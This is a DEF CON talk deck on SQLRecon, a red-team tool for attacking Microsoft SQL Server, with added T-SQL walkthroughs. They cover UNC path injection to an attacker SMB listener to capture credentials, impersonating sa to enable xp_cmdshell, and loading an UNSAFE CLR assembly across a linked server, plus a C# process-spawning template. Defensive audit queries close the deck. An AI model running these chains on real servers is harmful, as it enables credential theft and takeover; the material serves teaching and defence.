Abusing Microsoft SQL Server with SQLRecon
Sanjiv Kawa
IBM X-Force Red Adversary Services
Intro

Sanjiv Kawa
Senior Managing Security Consultant, Adversary Services at IBM X-Force Red
- Red Team Operator
- Post-Exploitation Tooling Developer
- github.com/xforcered/SQLRecon
@sanjivkawa
github.com/skahwah
Agenda

Microsoft SQL Server Overview (2 min)
SQLRecon Overview (4 min)
10 Demos! (20 min)
- Enumeration
- Standard Modules
- Attacking MS SQL Server with Low Privileges
- Abusing MS SQL Impersonation
- Attacking Linked MS SQL Servers
- Attacking MS MECM / SCCM Databases
Defensive Considerations (3 min)
Questions (5 min)
Get Involved!

Hack with me:
- Download the latest release of SQLRecon (v3.3) from github.com/skahwah/SQLRecon/releases
- Spin up a Windows VM
- Connect to SSID SQLRecon-Lab (don't worry, it's safe)
- Connection details will be provided before the demos
Microsoft SQL Server Overview

- Relational database for storing and retrieving data
- Deployed on-premises on Windows Server, or in the cloud as Azure SQL
- Used by businesses of all sizes, not just large enterprise networks
- Tightly integrated with Active Directory / Azure Active Directory (now Microsoft Entra ID)
Why Attack MS SQL Server?

- Often overlooked
- Often misconfigured
- The BUILTIN\Users login is present by default on many installations, so any domain user can connect and:
  - Execute basic SQL commands
  - Determine their privileges via user mappings and role memberships
  - Perform UNC path injection (make the SQL Server service account authenticate to an attacker-controlled share)
  - Piggyback off the rights of linked-server logins to compromise linked SQL Servers
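The four bullets above as T-SQL, added here as an example (this is not code from the deck or from SQLRecon; it shows the catalog queries and procedures the tool's enumeration wraps). Connect as any domain user; nothing in the batch needs more than the public role. The SMB listener address 172.16.10.50 is made up; the other names are SQL Server system objects.

```sql
-- Added example (not from the deck). Connect as a plain domain user, e.g.
--   sqlcmd -E -S SQL01
-- and run the whole batch.

-- 1. Who am I to SQL Server, and how did I get in?
--    SYSTEM_USER is the Windows login; USER_NAME() is the database user it maps
--    to (often 'guest'). sys.login_token lists every server principal in the
--    session token, so a 'BUILTIN\Users' row shows the access comes from that group.
SELECT SYSTEM_USER AS login_name, USER_NAME() AS db_user, DB_NAME() AS db;
SELECT name, type, usage FROM sys.login_token;

-- 2. Fixed server roles held, directly or through a group.
--    IS_SRVROLEMEMBER returns 1/0 for the current login (NULL = unknown role).
SELECT r.role_name, IS_SRVROLEMEMBER(r.role_name) AS is_member
FROM (VALUES ('sysadmin'), ('securityadmin'), ('serveradmin'), ('setupadmin'),
             ('processadmin'), ('diskadmin'), ('dbcreator'), ('bulkadmin')) AS r(role_name);

-- 3. Effective server-level permissions, and the databases this login can enter.
SELECT permission_name FROM fn_my_permissions(NULL, 'SERVER');
SELECT name FROM sys.databases WHERE HAS_DBACCESS(name) = 1;

-- 4. Which extended procedures may this login execute? xp_dirtree and
--    xp_fileexist are granted to public out of the box; xp_cmdshell is not.
SELECT x.proc_name, HAS_PERMS_BY_NAME(x.proc_name, 'OBJECT', 'EXECUTE') AS can_execute
FROM (VALUES ('master.sys.xp_dirtree'), ('master.sys.xp_fileexist'),
             ('master.sys.xp_cmdshell')) AS x(proc_name);

-- 5. UNC path injection. Both procedures make the SQL Server *service account*
--    (or the machine account SQL01$ when the service runs as a virtual or
--    managed account) open the path and authenticate to it, so an SMB listener
--    at 172.16.10.50 (made up; e.g. Responder or ntlmrelayx) captures or relays
--    its Net-NTLM credentials. The result set itself is irrelevant.
EXEC master.sys.xp_dirtree '\\172.16.10.50\share', 1, 1;
EXEC master.sys.xp_fileexist '\\172.16.10.50\share\probe.txt';
```

Step 4 is worth running before step 5: if both procedures report 0 the instance has been hardened and the coercion attempt will only produce a failed-permission event in the SQL Server error log.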
SQLRecon Overview
What's Currently Available?

A good number of offensive MS SQL Server tools already exist.
How Did This Research Come About?

Like most tooling, to solve a problem encountered on an engagement.
PowerShell is good, but C# holds up better against modern defensive controls.
SQLRecon addresses the MS SQL Server C# post-exploitation tooling gap:
- Modernize the approach red teamers can take when facing MS SQL Server
- Operational security
- Execution guardrails
- Works with a diverse set of C2 frameworks
- Compatible with both fork-and-run and in-process (inline) execution
Command Line Usage

SQLRecon is straightforward to use. There are only three required arguments:
- An authentication type
- The hostname or IP address of a MS SQL Server
- A module

Example: enumerating databases on a remote MS SQL Server

SQLRecon.exe /Auth:WinToken /Host:SQL01 /Module:databases

Short-form arguments are also accepted, and arguments are case-insensitive:

SQLRecon.exe /a:wintoken /h:172.16.10.101 /m:databases
Authentication Providers

SQLRecon supports 5 different MS SQL Server authentication providers:

Authentication Type   Example
WinToken              SQLRecon.exe /a:WinToken /h:host /m:module
WinDomain             SQLRecon.exe /a:WinDomain /d:domain /u:user /p:pass /h:host /m:module
Local                 SQLRecon.exe /a:Local /u:user /p:pass /h:host /m:module
AzureAD               SQLRecon.exe /a:AzureDomain /d:domain /u:user /p:pass /h:host /m:module
AzureLocal            SQLRecon.exe /a:AzureLocal /u:user /p:pass /h:host /m:module
Module Overview

SQLRecon has 83 different modules which can be used against MS SQL Server in a variety of scenarios. Listed below are the modules that can facilitate privilege escalation, lateral movement, or command execution.

Modules that cover all three (privilege escalation, lateral movement and command execution):
- xp_cmdshell
- OLE Automation Procedures
- CLR Integration for Custom .NET Assemblies
- Agent Jobs

Modules that each cover one of the three:
- Cleartext ADSI Credential Retrieval
- MECM / SCCM User Management
- Cleartext MECM / SCCM Credential Retrieval
Demo Time

Get Involved!

WiFi
SSID: SQLRecon-Lab
Password: DefconIsCancelled!

Rules
- Don't DoS the lab. We're all here to learn together.
- Don't attack each other. We're all here to learn together.
- You can attack AD and AAD if you want, but I promise you, it's not going to get you anything.

Lab (kawalabs.local)
DC01     172.16.10.100
SQL01    172.16.10.101
SQL02    172.16.10.102
SQL03    172.16.10.104
MECM01   172.16.10.103
ecom01.database.windows.net (Azure SQL)

Test your connection with:
SQLRecon.exe /a:WinDomain /d:kawalabs /u:jsmith /p:Password123 /h:172.16.10.101 /m:whoami
Demo 1: Evaluating the current user's permissions
Demo 2: Locating MS SQL Servers in AD via SPNs
Demo 3: Enumerating an Azure SQL database
Demo 4: Unprivileged UNC path injection
Demo 5: Operational security and execution guardrails
Demo 6: Privilege Escalation: Abusing Impersonation

BUILTIN\Users can impersonate sa!
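The check and the escalation behind this slide as T-SQL, added here as an example (not code from the deck or from SQLRecon). The names are the deck's: sa is the impersonation target, BUILTIN\Users the grantee, KAWALABS\jsmith the connecting domain user.

```sql
-- Added example (not from the deck). Run as KAWALABS\jsmith, a plain domain user.

-- 1. Who may impersonate whom? IMPERSONATE on a login is a server-level
--    permission (class SERVER_PRINCIPAL, major_id = the target login). Group
--    logins are principals too, so a grant to BUILTIN\Users reaches every
--    domain user. A low-privileged session only sees grants that apply to it,
--    which is exactly the set worth knowing.
SELECT grantee.name AS grantee,
       target.name  AS can_impersonate,
       IS_SRVROLEMEMBER('sysadmin', target.name) AS target_is_sysadmin
FROM sys.server_permissions p
JOIN sys.server_principals grantee ON grantee.principal_id = p.grantee_principal_id
JOIN sys.server_principals target  ON target.principal_id  = p.major_id
WHERE p.permission_name = 'IMPERSONATE'
  AND p.class_desc = 'SERVER_PRINCIPAL'
  AND p.state = 'G';
-- in the lab this returns: BUILTIN\Users | sa | 1

-- 2. Switch the session to sa. EXECUTE AS LOGIN changes the server-level
--    identity (EXECUTE AS USER only changes it inside one database).
SELECT SYSTEM_USER AS before_switch, IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin;
EXECUTE AS LOGIN = 'sa';
SELECT SYSTEM_USER AS after_switch,  IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin;

-- 3. Use the borrowed sysadmin context. xp_cmdshell is one of the modules in
--    the module overview; enabling it is a server-wide, logged configuration change.
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;          RECONFIGURE;
EXEC master..xp_cmdshell 'whoami';           -- prints the SQL Server service account

-- 4. Drop back to the original login. Impersonation nests: REVERT unwinds one
--    level, so a chain jsmith -> other login -> sa needs two REVERTs.
REVERT;
SELECT SYSTEM_USER AS back_to;
```

Two caveats a practitioner should keep in mind. First, the grant does not have to be on sa directly: IMPERSONATE on any login that is itself sysadmin, or that can in turn impersonate one, gives the same result, so walk the result set of step 1 recursively. Second, the database-scoped variant is just as dangerous: in a database that is TRUSTWORTHY and owned by a sysadmin, EXECUTE AS USER = 'dbo' (or plain db_owner membership) also yields sysadmin-level execution.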
Demo 7: Lateral Movement: Abusing Linked MS SQL Servers

SQL02 has an MS SQL Server link to SQL03.

- CLR Integration allows custom .NET assemblies to be imported into MS SQL Server
- The assembly bytes are stored in the database (CREATE ASSEMBLY); a stored procedure bound to a method in the assembly (CREATE PROCEDURE ... AS EXTERNAL NAME) exposes it to T-SQL
- Executing that procedure runs whatever the custom assembly contains, inside the SQL Server process and as the service account

Basic Template: gist.github.com/skahwah/c92a8ce41f529f40c14715c91b8f90ce
Process Hollowing: gist.github.com/skahwah/a585e176e4a5cf319b0c759637f5c410
// sql.cs
// Compile on the operator's machine with the .NET Framework C# compiler:
// C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library c:\temp\sql.cs
using System;
using System.Data;
using System.Data.SqlClient;
using System.Data.SqlTypes;
using Microsoft.SqlServer.Server;
using System.Diagnostics;

public partial class StoredProcedures
{
    // Bound from T-SQL with:
    //   CREATE PROCEDURE ... AS EXTERNAL NAME <assembly>.StoredProcedures.CustomFunctionName
    [Microsoft.SqlServer.Server.SqlProcedure]
    public static void CustomFunctionName()
    {
        // Runs inside sqlservr.exe as the SQL Server service account.
        // Spawning a process requires the assembly to be loaded with PERMISSION_SET = UNSAFE.
        Process proc = new Process();
        proc.StartInfo.FileName = @"C:\Windows\System32\notepad.exe";
        proc.Start();
    }
}
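How the SQL02 to SQL03 link is followed and the procedure compiled from sql.cs is loaded on the far side, as T-SQL added here for illustration (not code from the deck or from SQLRecon, which automates the same sequence in its linked-server mode). Run on SQL02. The assembly name sqlrecon_demo is made up and the 0x4D5A... literal is a placeholder for the full bytes of the compiled sql.dll; SQL02, SQL03 and msdb are lab and system names.

```sql
-- Added example (not from the deck). Run on SQL02 as a login that can use the
-- SQL03 link. Replace 0x4D5A... with the hex of sql.dll, e.g. from Windows
-- PowerShell 5.1:
--   '0x' + ((Get-Content sql.dll -Encoding Byte | % { '{0:X2}' -f $_ }) -join '')

-- 1. Enumerate links and how they authenticate. uses_self_credential = 1
--    forwards the caller's own identity (needs Kerberos delegation to work);
--    remote_name set means a stored login, frequently sa, is used for everyone.
--    provider 'ADSDSOObject' is an ADSI link (what Demo 8 abuses); SQL Server
--    links use SQLNCLI* or MSOLEDBSQL.
SELECT s.name, s.data_source, s.provider, s.is_rpc_out_enabled,
       ll.uses_self_credential, ll.remote_name
FROM sys.servers s
LEFT JOIN sys.linked_logins ll ON ll.server_id = s.server_id
WHERE s.is_linked = 1;

-- 2. Who are we on the far side, and is it enough?
SELECT * FROM OPENQUERY(SQL03,
  'SELECT SYSTEM_USER AS remote_login, IS_SRVROLEMEMBER(''sysadmin'') AS is_sysadmin');

-- 3. EXEC ... AT needs "rpc out" on the link (OPENQUERY alone only runs queries).
--    Turning it on needs ALTER ANY LINKED SERVER on SQL02, not anything on SQL03.
EXEC sp_serveroption @server = 'SQL03', @optname = 'rpc out', @optvalue = 'true';

-- 4. Turn CLR on remotely (sysadmin on SQL03 via the link's login).
--    'clr strict security' (2017+) refuses unsigned assemblies; the quieter
--    alternative that leaves it on is sys.sp_add_trusted_assembly with the
--    DLL's SHA-512, also a sysadmin call.
EXEC ('EXEC sp_configure ''show advanced options'', 1; RECONFIGURE;') AT SQL03;
EXEC ('EXEC sp_configure ''clr enabled'', 1; RECONFIGURE;') AT SQL03;
EXEC ('EXEC sp_configure ''clr strict security'', 0; RECONFIGURE;') AT SQL03;

-- 5. Load the assembly from its bytes (nothing is written to disk on SQL03)
--    into msdb, which is TRUSTWORTHY and owned by sa out of the box, so
--    PERMISSION_SET = UNSAFE is accepted without altering any database.
--    The EXTERNAL NAME must match the class and method in sql.cs.
EXEC ('USE msdb; CREATE ASSEMBLY sqlrecon_demo
       FROM 0x4D5A90000300000004000000FFFF0000 /* ...rest of sql.dll... */
       WITH PERMISSION_SET = UNSAFE;') AT SQL03;
EXEC ('USE msdb; EXEC(''CREATE PROCEDURE dbo.CustomFunctionName
       AS EXTERNAL NAME sqlrecon_demo.StoredProcedures.CustomFunctionName;'');') AT SQL03;

-- 6. Execute: notepad.exe starts on SQL03 as the SQL Server service account.
EXEC ('EXEC msdb.dbo.CustomFunctionName;') AT SQL03;

-- 7. Clean up, and put the configuration options back as you found them.
EXEC ('USE msdb; DROP PROCEDURE dbo.CustomFunctionName; DROP ASSEMBLY sqlrecon_demo;') AT SQL03;
```

The inner EXEC('') in step 5 is there because CREATE PROCEDURE must be the first statement of its batch, while USE msdb has to precede it; everything else is a single remote batch. Every statement in steps 3 to 7 lands in SQL03's default trace and, if configured, its SQL Server Audit, so on an engagement with guardrails this is the noisy part of the chain.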
Demo 8: Credential Abuse: ADSI Double-Link Boomerang

SQL03 has an ADSI link to DC01.
Demo 9: SCCM / MECM enumeration
Demo 10: Privilege Escalation: MECM / SCCM
Defensive Considerations

Check out the Wiki for comprehensive Prevention, Detection and Mitigation guidance:
github.com/xforcered/SQLRecon/wiki
Top 3 MS SQL Server Security Controls
- Follow the Microsoft SQL Server security best practices
- Consider removing the BUILTIN\Users login, and any other low-privilege Windows group login, so that arbitrary domain users can no longer authenticate to MS SQL Server instances
- Evaluate impersonation grants and MS SQL Server links (including ADSI links) for the privileges they hand out

github.com/xforcered/SQLRecon/wiki
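The three controls as T-SQL checks with the matching remediation, added here as an example (not from the deck, from SQLRecon or from its wiki). Run as sysadmin on each instance. Every name below is either a SQL Server catalog object or the deck's lab (SQL03); nothing else is assumed.

```sql
-- Added example (not from the deck). Audit queries for the three controls,
-- each followed by the fix as a commented-out statement.

-- Control 2: broad Windows group logins that give every domain user a login.
--            type 'G' = Windows group.
SELECT name, type_desc, is_disabled, create_date
FROM sys.server_principals
WHERE type = 'G'
  AND (name IN ('BUILTIN\Users', 'NT AUTHORITY\Authenticated Users',
                'NT AUTHORITY\Everyone')
       OR name LIKE '%\Domain Users');
-- Fix: DROP LOGIN [BUILTIN\Users];
--      or, to keep the principal for auditing but refuse connections,
--      ALTER LOGIN [BUILTIN\Users] DISABLE;

-- Control 3a: IMPERSONATE grants whose target is a sysadmin login.
SELECT grantee.name AS grantee, target.name AS can_impersonate
FROM sys.server_permissions p
JOIN sys.server_principals grantee ON grantee.principal_id = p.grantee_principal_id
JOIN sys.server_principals target  ON target.principal_id  = p.major_id
WHERE p.permission_name = 'IMPERSONATE' AND p.class_desc = 'SERVER_PRINCIPAL'
  AND IS_SRVROLEMEMBER('sysadmin', target.name) = 1;
-- Fix: REVOKE IMPERSONATE ON LOGIN::[sa] FROM [BUILTIN\Users];

-- Control 3b: TRUSTWORTHY databases owned by a sysadmin. db_owner there (or
--             EXECUTE AS USER = 'dbo') reaches sysadmin; msdb is the expected one.
SELECT d.name, SUSER_SNAME(d.owner_sid) AS owner
FROM sys.databases d
WHERE d.is_trustworthy_on = 1 AND d.name <> 'msdb';
-- Fix: ALTER DATABASE [name] SET TRUSTWORTHY OFF;

-- Control 3c: linked servers carrying a stored remote login. Anyone who can
--             query this instance inherits that login on the far side, and
--             "rpc out" lets them run arbitrary batches there.
SELECT s.name, s.data_source, s.provider, ll.remote_name, s.is_rpc_out_enabled
FROM sys.servers s
JOIN sys.linked_logins ll ON ll.server_id = s.server_id
WHERE s.is_linked = 1 AND ll.uses_self_credential = 0 AND ll.remote_name IS NOT NULL;
-- Fix: EXEC sp_droplinkedsrvlogin 'SQL03', NULL;   -- then re-add a least-privilege login
--      EXEC sp_serveroption 'SQL03', 'rpc out', 'false';

-- Control 1 (best practices): the execution features behind the xp_cmdshell,
--             OLE Automation and CLR modules should be off unless documented.
SELECT name, CAST(value_in_use AS int) AS enabled
FROM sys.configurations
WHERE name IN ('xp_cmdshell', 'Ole Automation Procedures', 'clr enabled', 'clr strict security');
-- Fix: EXEC sp_configure 'xp_cmdshell', 0; RECONFIGURE;  (same for 'Ole Automation
--      Procedures'; keep 'clr strict security' = 1 and sign any assembly you need)
```

Run the audit on every instance an SPN search turns up, not just the ones the DBAs know about: the instances that score worst on these checks are usually the forgotten ones, which is the "often overlooked" point from the start of the talk.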
Questions or Comments?
Thank You
@xforcered
github.com/xforcered/SQLRecon
IBM X-Force Red
github.com/skahwah
@sanjivkawa
DEF CON 31 Demo Labs 2023: Abusing Microsoft SQL Server with SQLRecon

More Related Content

What's hot

Hunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows EnvironmentHunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows EnvironmentTeymur Kheirkhabarov
 
PSConfEU - Offensive Active Directory (With PowerShell!)
PSConfEU - Offensive Active Directory (With PowerShell!)PSConfEU - Offensive Active Directory (With PowerShell!)
PSConfEU - Offensive Active Directory (With PowerShell!)Will Schroeder
 
Offensive PowerShell Cheat Sheet
Offensive	PowerShell Cheat SheetOffensive	PowerShell Cheat Sheet
Offensive PowerShell Cheat SheetRahmat Nurfauzi
 
Windows Threat Hunting
Windows Threat HuntingWindows Threat Hunting
Windows Threat HuntingGIBIN JOHN
 
Catch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs BlueCatch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs BlueWill Schroeder
 
Nemesis - SAINTCON.pdf
Nemesis - SAINTCON.pdfNemesis - SAINTCON.pdf
Nemesis - SAINTCON.pdfWill Schroeder
 
Pursuing evasive custom command & control - GuideM
Pursuing evasive custom command & control - GuideMPursuing evasive custom command & control - GuideM
Pursuing evasive custom command & control - GuideMMark Secretario
 
Windows logging cheat sheet
Windows logging cheat sheetWindows logging cheat sheet
Windows logging cheat sheetMichael Gough
 
Hunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureHunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureSergey Soldatov
 
Would you Rather Have Telemetry into 2 Attacks or 20? An Insight Into Highly ...
Would you Rather Have Telemetry into 2 Attacks or 20? An Insight Into Highly ...Would you Rather Have Telemetry into 2 Attacks or 20? An Insight Into Highly ...
Would you Rather Have Telemetry into 2 Attacks or 20? An Insight Into Highly ...MITRE ATT&CK
 
Splunk workshop-Threat Hunting
Splunk workshop-Threat HuntingSplunk workshop-Threat Hunting
Splunk workshop-Threat HuntingSplunk
 
Finding attacks with these 6 events
Finding attacks with these 6 eventsFinding attacks with these 6 events
Finding attacks with these 6 eventsMichael Gough
 
Pwning the Enterprise With PowerShell
Pwning the Enterprise With PowerShellPwning the Enterprise With PowerShell
Pwning the Enterprise With PowerShellBeau Bullock
 
Splunk for Enterprise Security featuring User Behavior Analytics
Splunk for Enterprise Security featuring User Behavior AnalyticsSplunk for Enterprise Security featuring User Behavior Analytics
Splunk for Enterprise Security featuring User Behavior AnalyticsSplunk
 
Bypass_AV-EDR.pdf
Bypass_AV-EDR.pdfBypass_AV-EDR.pdf
Bypass_AV-EDR.pdfFarouk2nd
 
Privilege escalation from 1 to 0 Workshop
Privilege escalation from 1 to 0 Workshop Privilege escalation from 1 to 0 Workshop
Privilege escalation from 1 to 0 Workshop Hossam .M Hamed
 
Best Practices for Configuring Your OSSIM Installation
Best Practices for Configuring Your OSSIM InstallationBest Practices for Configuring Your OSSIM Installation
Best Practices for Configuring Your OSSIM InstallationAlienVault
 
Windows İşletim Sistemi Yetki Yükseltme Çalışmaları
Windows İşletim Sistemi Yetki Yükseltme ÇalışmalarıWindows İşletim Sistemi Yetki Yükseltme Çalışmaları
Windows İşletim Sistemi Yetki Yükseltme ÇalışmalarıBGA Cyber Security
 

What's hot (20)

Hunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows EnvironmentHunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows Environment
 
A Threat Hunter Himself
A Threat Hunter HimselfA Threat Hunter Himself
A Threat Hunter Himself
 
Defending Your "Gold"
Defending Your "Gold"Defending Your "Gold"
Defending Your "Gold"
 
PSConfEU - Offensive Active Directory (With PowerShell!)
PSConfEU - Offensive Active Directory (With PowerShell!)PSConfEU - Offensive Active Directory (With PowerShell!)
PSConfEU - Offensive Active Directory (With PowerShell!)
 
Offensive PowerShell Cheat Sheet
Offensive	PowerShell Cheat SheetOffensive	PowerShell Cheat Sheet
Offensive PowerShell Cheat Sheet
 
Windows Threat Hunting
Windows Threat HuntingWindows Threat Hunting
Windows Threat Hunting
 
Catch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs BlueCatch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs Blue
 
Nemesis - SAINTCON.pdf
Nemesis - SAINTCON.pdfNemesis - SAINTCON.pdf
Nemesis - SAINTCON.pdf
 
Pursuing evasive custom command & control - GuideM
Pursuing evasive custom command & control - GuideMPursuing evasive custom command & control - GuideM
Pursuing evasive custom command & control - GuideM
 
Windows logging cheat sheet
Windows logging cheat sheetWindows logging cheat sheet
Windows logging cheat sheet
 
Hunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureHunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows Infrastructure
 
Would you Rather Have Telemetry into 2 Attacks or 20? An Insight Into Highly ...
Would you Rather Have Telemetry into 2 Attacks or 20? An Insight Into Highly ...Would you Rather Have Telemetry into 2 Attacks or 20? An Insight Into Highly ...
Would you Rather Have Telemetry into 2 Attacks or 20? An Insight Into Highly ...
 
Splunk workshop-Threat Hunting
Splunk workshop-Threat HuntingSplunk workshop-Threat Hunting
Splunk workshop-Threat Hunting
 
Finding attacks with these 6 events
Finding attacks with these 6 eventsFinding attacks with these 6 events
Finding attacks with these 6 events
 
Pwning the Enterprise With PowerShell
Pwning the Enterprise With PowerShellPwning the Enterprise With PowerShell
Pwning the Enterprise With PowerShell
 
Splunk for Enterprise Security featuring User Behavior Analytics
Splunk for Enterprise Security featuring User Behavior AnalyticsSplunk for Enterprise Security featuring User Behavior Analytics
Splunk for Enterprise Security featuring User Behavior Analytics
 
Bypass_AV-EDR.pdf
Bypass_AV-EDR.pdfBypass_AV-EDR.pdf
Bypass_AV-EDR.pdf
 
Privilege escalation from 1 to 0 Workshop
Privilege escalation from 1 to 0 Workshop Privilege escalation from 1 to 0 Workshop
Privilege escalation from 1 to 0 Workshop
 
Best Practices for Configuring Your OSSIM Installation
Best Practices for Configuring Your OSSIM InstallationBest Practices for Configuring Your OSSIM Installation
Best Practices for Configuring Your OSSIM Installation
 
Windows İşletim Sistemi Yetki Yükseltme Çalışmaları
Windows İşletim Sistemi Yetki Yükseltme ÇalışmalarıWindows İşletim Sistemi Yetki Yükseltme Çalışmaları
Windows İşletim Sistemi Yetki Yükseltme Çalışmaları
 

Similar to DEF CON 31 Demo Labs 2023: Abusing Microsoft SQL Server with SQLRecon

2019 Blackhat Booth Presentation - PowerUpSQL
2019 Blackhat Booth Presentation - PowerUpSQL2019 Blackhat Booth Presentation - PowerUpSQL
2019 Blackhat Booth Presentation - PowerUpSQLScott Sutherland
 
Database Mirror for the exceptional DBA – David Izahk
Database Mirror for the exceptional DBA – David IzahkDatabase Mirror for the exceptional DBA – David Izahk
Database Mirror for the exceptional DBA – David Izahksqlserver.co.il
 
SQL Server Security - Attack
SQL Server Security - Attack SQL Server Security - Attack
SQL Server Security - Attack webhostingguy
 
SDC - Programming the CLR in SQL Server 2005.ppt (1.51 MB)
SDC - Programming the CLR in SQL Server 2005.ppt (1.51 MB)SDC - Programming the CLR in SQL Server 2005.ppt (1.51 MB)
SDC - Programming the CLR in SQL Server 2005.ppt (1.51 MB)webhostingguy
 
TROOPERS 20 - SQL Server Hacking Tips for Active Directory Environments
TROOPERS 20 - SQL Server Hacking Tips for Active Directory EnvironmentsTROOPERS 20 - SQL Server Hacking Tips for Active Directory Environments
TROOPERS 20 - SQL Server Hacking Tips for Active Directory EnvironmentsScott Sutherland
 
Abusing MS SQL Using SQLRecon
Abusing MS SQL Using SQLReconAbusing MS SQL Using SQLRecon
Abusing MS SQL Using SQLReconSanjiv Kawa
 
61883659_WinCC_RuntimeAdv_access_SQL_via_script_DOCU_en (1).pdf
61883659_WinCC_RuntimeAdv_access_SQL_via_script_DOCU_en (1).pdf61883659_WinCC_RuntimeAdv_access_SQL_via_script_DOCU_en (1).pdf
61883659_WinCC_RuntimeAdv_access_SQL_via_script_DOCU_en (1).pdfmohamedhayballa1
 
PowerUpSQL - 2018 Blackhat USA Arsenal Presentation
PowerUpSQL - 2018 Blackhat USA Arsenal PresentationPowerUpSQL - 2018 Blackhat USA Arsenal Presentation
PowerUpSQL - 2018 Blackhat USA Arsenal PresentationScott Sutherland
 
SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012
SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012
SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012Scott Sutherland
 
MySQL Day Roma - MySQL Shell and Visual Studio Code Extension
MySQL Day Roma - MySQL Shell and Visual Studio Code ExtensionMySQL Day Roma - MySQL Shell and Visual Studio Code Extension
MySQL Day Roma - MySQL Shell and Visual Studio Code ExtensionFrederic Descamps
 
Ultimate Free SQL Server Toolkit
Ultimate Free SQL Server ToolkitUltimate Free SQL Server Toolkit
Ultimate Free SQL Server ToolkitKevin Kline
 
Enter the Dragon - SQL 2014 on Server Core PASS Summit 2014 Edition
Enter the Dragon -  SQL 2014 on Server Core PASS Summit 2014 EditionEnter the Dragon -  SQL 2014 on Server Core PASS Summit 2014 Edition
Enter the Dragon - SQL 2014 on Server Core PASS Summit 2014 EditionMark Broadbent
 
2016 aRcTicCON - Hacking SQL Server on Scale with PowerShell (Slide Updates)
2016 aRcTicCON - Hacking SQL Server on Scale with PowerShell (Slide Updates)2016 aRcTicCON - Hacking SQL Server on Scale with PowerShell (Slide Updates)
2016 aRcTicCON - Hacking SQL Server on Scale with PowerShell (Slide Updates)Scott Sutherland
 
DevOps and the Future of Enterprise Security
DevOps and the Future of Enterprise SecurityDevOps and the Future of Enterprise Security
DevOps and the Future of Enterprise SecurityFrank Kim
 
SQLSaturday#290_Kiev_WindowsAzureDatabaseForBeginners
SQLSaturday#290_Kiev_WindowsAzureDatabaseForBeginnersSQLSaturday#290_Kiev_WindowsAzureDatabaseForBeginners
SQLSaturday#290_Kiev_WindowsAzureDatabaseForBeginnersTobias Koprowski
 
The Emergence of Choice in the .NET Ecosystem
The Emergence of Choice in the .NET EcosystemThe Emergence of Choice in the .NET Ecosystem
The Emergence of Choice in the .NET EcosystemJames Avery
 
Understanding and preventing sql injection attacks
Understanding and preventing sql injection attacksUnderstanding and preventing sql injection attacks
Understanding and preventing sql injection attacksKevin Kline
 

Similar to DEF CON 31 Demo Labs 2023: Abusing Microsoft SQL Server with SQLRecon (20)

SQL Injection
SQL InjectionSQL Injection
SQL Injection
 
2019 Blackhat Booth Presentation - PowerUpSQL
2019 Blackhat Booth Presentation - PowerUpSQL2019 Blackhat Booth Presentation - PowerUpSQL
2019 Blackhat Booth Presentation - PowerUpSQL
 
Database Mirror for the exceptional DBA – David Izahk
Database Mirror for the exceptional DBA – David IzahkDatabase Mirror for the exceptional DBA – David Izahk
Database Mirror for the exceptional DBA – David Izahk
 
SQL Server Security - Attack
SQL Server Security - Attack SQL Server Security - Attack
SQL Server Security - Attack
 
SDC - Programming the CLR in SQL Server 2005.ppt (1.51 MB)
SDC - Programming the CLR in SQL Server 2005.ppt (1.51 MB)SDC - Programming the CLR in SQL Server 2005.ppt (1.51 MB)
SDC - Programming the CLR in SQL Server 2005.ppt (1.51 MB)
 
TROOPERS 20 - SQL Server Hacking Tips for Active Directory Environments
TROOPERS 20 - SQL Server Hacking Tips for Active Directory EnvironmentsTROOPERS 20 - SQL Server Hacking Tips for Active Directory Environments
TROOPERS 20 - SQL Server Hacking Tips for Active Directory Environments
 
Abusing MS SQL Using SQLRecon
Abusing MS SQL Using SQLReconAbusing MS SQL Using SQLRecon
Abusing MS SQL Using SQLRecon
 
Sql Sever Presentation.pptx
Sql Sever Presentation.pptxSql Sever Presentation.pptx
Sql Sever Presentation.pptx
 
61883659_WinCC_RuntimeAdv_access_SQL_via_script_DOCU_en (1).pdf
61883659_WinCC_RuntimeAdv_access_SQL_via_script_DOCU_en (1).pdf61883659_WinCC_RuntimeAdv_access_SQL_via_script_DOCU_en (1).pdf
61883659_WinCC_RuntimeAdv_access_SQL_via_script_DOCU_en (1).pdf
 
PowerUpSQL - 2018 Blackhat USA Arsenal Presentation
PowerUpSQL - 2018 Blackhat USA Arsenal PresentationPowerUpSQL - 2018 Blackhat USA Arsenal Presentation
PowerUpSQL - 2018 Blackhat USA Arsenal Presentation
 
SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012
SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012
SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012
 
MySQL Day Roma - MySQL Shell and Visual Studio Code Extension
MySQL Day Roma - MySQL Shell and Visual Studio Code ExtensionMySQL Day Roma - MySQL Shell and Visual Studio Code Extension
MySQL Day Roma - MySQL Shell and Visual Studio Code Extension
 
Ultimate Free SQL Server Toolkit
Ultimate Free SQL Server ToolkitUltimate Free SQL Server Toolkit
Ultimate Free SQL Server Toolkit
 
Enter the Dragon - SQL 2014 on Server Core PASS Summit 2014 Edition
